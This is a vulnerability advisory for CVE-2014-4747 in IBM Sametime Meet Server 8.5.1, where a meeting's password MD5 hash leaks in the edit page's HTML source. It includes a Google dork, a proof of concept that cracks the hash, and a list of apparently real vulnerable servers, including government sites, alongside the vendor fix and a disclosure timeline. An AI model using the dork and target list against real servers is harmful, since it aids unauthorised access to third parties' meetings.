# Exploit Title: 	IBM Sametime Meet Server 8.5 Password Disclosure
# Google Dork: 		intitle:"Meeting Center - IBM Lotus Sametime"
# Date: 		11/08/2014
# CVSS Score: 		http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=AV:L/AC:L/Au:N/C:P/I:N/A:N
# CVE-ID: 		http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4747
# OSVDB-ID: 		http://osvdb.org/109443
#
# Author: 		Adriano Marcio Monteiro
# E-mail: 		adrianomarciomonteiro@gmail.com
# Blog: 		http://www.brazucasecurity.com.br
# 	
# Vendor: 		http://www.ibm.com
# Software: 		http://www.ibm.com/sametime
# Version: 		8.5.1
# Advisory: 		https://www-304.ibm.com/support/docview.wss?uid=swg21679221
# 	
# Test Type: 		Black Box
# Tested on: 		Windows 7 Enterprise SP1 x86 pt-br, Mozilla Firefox 30.0 /Internet Explorer 10 / Google Chrome Versão 33.0.1750.146 m



Table of  Contents

[0x00] The Vulnerability
[0x01] Exploit Description
[0x02] PoC - Proof of Concept
[0x03] Correction or Workaround
[0x04] Timeline
[0x05] Published
[0x06] References
[0x07] Bibliography



[0x00] The Vulnerabilty

	Password Disclosure
	Revealing system data or debugging information helps an adversary learn about the system and form a plan of attack. An information leak occurs when system data or debugging information leaves the program through an output stream or logging function.



[0x01] Exploit Description

	On the page that allows editing a meeting is possible to retrieve the MD5 hash of the password of the meeting just by reading the HTML source code of the page.



[0x02] PoC - Proof of Concept

	For exploit this vulnerability you only need to analyze the source code of  page.
	
	http://sametime02.myserver.com.br/stconf.nsf/meeting/8635AEFF1CBFAAF283257D09004602CE?editdocument&1404305088536

	[...]
	<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="Password" id="pw">
	<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="ConfirmPassword" id="rpw">
	[...]

	http://www.md5online.org
	E1FAFFB3E614E6C2FBA74296962386B7 -> Found: AAA

	Examples:

	    http://sametime.eletrosul.gov.br/stconf.nsf/frmConference?OpenForm
	    http://sametime.sp.gov.br/stconf.nsf/frmConference?OpenForm
	    http://sametime.grude.ufmg.br/stconf.nsf/frmConference?OpenForm
	    http://sametime.schahin.com.br/stconf.nsf/frmConference?OpenForm
	    http://sametime.c-pack.com.br/stconf.nsf/frmConference?OpenForm
	    http://www.azi.com.br/stconf.nsf/frmConference?OpenForm
	    http://aquila.sealinc.org/stconf.nsf/frmConference?Openform
	    http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
	    http://comware.net/stconf.nsf/frmConference?Openform
	    https://236ws.dpteruel.es/stconf.nsf/frmConference?OpenForm
	    https://correoweb.gruposanjose.biz/stconf.nsf/frmConference?Openform
	    http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
	    https://mail.dba.uz/stconf.nsf/frmConference?Openform



[0x03] Correction or Workaround

	Apply the procedures described in the follow link:
	http://www-01.ibm.com/support/docview.wss?uid=swg21679454



[0x04] Timeline

	18/07/2014 - Vulnerabilities discovered
	19/07/2014 - Vulnerabilities reporteds to IBM PSIRT Team
	23/07/2014 - Advisory and troubleshooting fix published



[0x05] Published

	http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4747
	http://www.securityfocus.com/bid/68823
 


[0x06] References

	Information Leakage
	https://www.owasp.org/index.php/Information_Leakage

	CWE-200: Information Exposure
	http://cwe.mitre.org/data/definitions/200.html



[0x07] Bibliography

	http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent



[end]